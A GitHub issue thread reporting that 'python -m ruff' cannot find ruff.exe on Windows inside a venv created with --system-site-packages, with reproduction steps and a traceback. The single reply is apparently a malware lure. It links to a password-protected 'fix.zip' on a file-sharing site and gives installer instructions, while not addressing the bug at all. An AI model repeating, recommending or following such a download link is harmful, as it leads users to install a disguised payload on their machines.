### ISSUE TITLE
Cannot find ruff on Windows in venv using --system-site-packages

### ISSUE THREAD

**Issue by markuspi** [astral-sh/ruff#13110]
`python -m ruff` can't find ruff.exe on Windows when using `--system-site-packages`:

1) Prerequisite: have ruff installed system-wide on Windows. The bug does not trigger if it is installed in the per-user packages in AppData.
  _Example_: I have a Python311 installed in `C:\Python311`, with ruff at `C:\Python311\Lib\site-packages\ruff\__main__.py` and `C:\Python311\Scripts\ruff.exe`.

2) Create virtual environment using `--system-site-packages` flag
    ```powershell
    C:\Python311\python -m venv --system-site-packages myvenv
    ```

3) Using virual environment to run `python -m ruff` results in FileNotFoundError.
    ```powershell
    .\myvenv\Scripts\python -m ruff
    ```
    ```text
    Traceback (most recent call last):
      File "<frozen runpy>", line 198, in _run_module_as_main
      File "<frozen runpy>", line 88, in _run_code
      File "C:\Python311\Lib\site-packages\ruff\__main__.py", line 40, in <module>
        ruff = os.fsdecode(find_ruff_bin())
                           ^^^^^^^^^^^^^^^
      File "C:\Python311\Lib\site-packages\ruff\__main__.py", line 36, in find_ruff_bin
        raise FileNotFoundError(scripts_path)
    FileNotFoundError: C:\[...]\myvenv\Scripts\ruff.exe
    ```

Ruff version: 0.6.2

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
